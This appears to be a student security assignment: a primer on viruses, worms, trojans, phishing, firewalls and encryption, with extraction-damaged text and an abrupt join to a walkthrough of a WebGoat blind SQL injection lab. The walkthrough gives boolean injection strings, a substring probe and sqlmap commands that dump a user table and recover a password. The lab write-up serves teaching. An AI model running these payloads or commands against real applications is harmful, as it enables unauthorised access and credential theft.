Task – 1

Introduc on : Understand the basics of network security by learning about different types of
network threats and how to implement basic security measures. This task will introduce you to the
founda onal concepts of securing a small network.

Types of Network Threats

1. Viruses:

o Defini on: Malicious so ware that a aches itself to a host file or program and
spreads when the host is executed.

o Propaga on: Viruses require human ac on to spread, such as downloading an

infected file or execu ng a malicious a achment.

o Impact: Can corrupt or delete files, steal personal data, and cause system failures.

2. Worms:

o Defini on: Self-replica ng malware that spreads across networks without needing a
host file.

o Propaga on: Exploits vulnerabili es in network services and spreads through local
or wide-area networks.

o Impact: Can cause network conges on, overload servers, and allow a ackers to
install backdoors.

3. Trojans:

o Defini on: Malicious so ware disguised as legi mate so ware. Users unknowingly
execute the malware.

o Propaga on: Trojans are o en spread through downloads or email a achments.

o Impact: Once installed, they can give a ackers control of the system, steal
informa on, or install other malware.

4. Phishing A acks:

o Defini on: A form of social engineering where a ackers trick individuals into
providing sensi ve informa on (like passwords or credit card details) by pretending
to be legi mate en es.

o Propaga on: O en occurs via email, instant messaging, or fake websites that
resemble trusted organiza ons.

o Impact: Can result in iden ty the , financial loss, or compromise of sensi ve data.

Basic Security Concepts

1. Firewalls:
 o Defini on: A security system that monitors and controls incoming and outgoing
network traffic based on predetermined security rules.

o Types:

 Network firewalls: These filter traffic between different networks, such as

the internet and an internal network.

 Host-based firewalls: Installed on individual devices to filter traffic coming

into and leaving the device.

o Purpose: Prevent unauthorized access to or from a network while allowing

legi mate communica on.

2. Encryp on:

o Defini on: The process of conver ng data into an unreadable format (ciphertext) to
prevent unauthorized access.

o Types:

 Symmetric encryp on: Uses the same key for encryp on and decryp on.

 Asymmetric encryp on: Uses a pair of public and private keys for encryp on
and decryp on.

o Purpose: Protects data integrity and confiden ality during storage or transmission.

3. Secure Network Configura ons:

o Defini on: Proper setup and management of network devices to minimize

vulnerabili es.

o Elements:

 Segmenta on: Isola ng sensi ve parts of a network to limit access.

 Secure Protocols: Using encrypted communica on protocols (e.g., HTTPS,

SSL/TLS, SSH) to ensure secure data transmission.

 Regular Patch Management: Keeping network hardware and so ware up-to-

date to avoid exploita on of vulnerabili es.

o Purpose: Reduces the a ack surface and prevents exploita on of misconfigura ons
or outdated so ware.

Understanding these threats and implemen ng strong security measures like firewalls, encryp on,
and secure configura ons helps in crea ng a robust network defense strateg
As both the registra on and the login worked fine with the new user, I can assume that both the
form values I sent over for these two opera ons where resul ng in valid SQL queries.

So what happen if I try to send them again with some a ached SQLi test?

newuser' AND '1'='1

From this response I understand that the app is checking if the username already exists by running
the query we provided, thus this statement is a valid TRUE statement since the username already
exists
newuser' and '1'='2

Hence this is a valid FALSE statement.

This is all we need to ask the database for all its data, as long as the db user is allowed to read them.

In lesson #4 we were given a hint on this problem

AND substring(database_version(),1,1) = '2

By varying the posi on argument for substring() and the literal value we can then loop through all
posi ons and see what matches, we can find subsequent character posi ons of the database values
by using Burp Intruder, this can be done by using a sniper a ack on the §2§ with a list such
as h ps://github.com/xmendez/wfuzz/blob/master/wordlist/stress/alphanum_case_extra.txt and
see what request returns a TRUE statement
The database value is 2.5.0 on my WebGoat install

I then wanted to automate with sqlmap and see what I could get from the db.

The simplest way I know in order to give sqlmap a proper request is to

 submit the ini al request and get the response for a TRUE statement from the browser
  copy them from Burp

 use the request as input file and the response as string parameter for the TRUE statement in
sqlmap

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
threads 1

current DB is PUBLIC + Boolean Blind SQL

Let’s try to get the table names

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
thread=10 --technique=B --dbms="HSQLDB" -D PUBLIC --tables --level=5 --risk=3
I would then start by looking at the CHALLENGE_USERS table

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
thread=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS --columns --level=5 --
risk=3

sqlmap asking permission to brute force column names with its wordlist and the result

And get the table rows, this me I have to lower the number of threads due to the number or errors I
was ge ng with 10 threads on my machine

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
thread=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS -C userid,password --
dump --level=5 --risk=3
CHALLENGE_USERS table and Tom password

Now we have username and password for Tom and can login on the lesson login form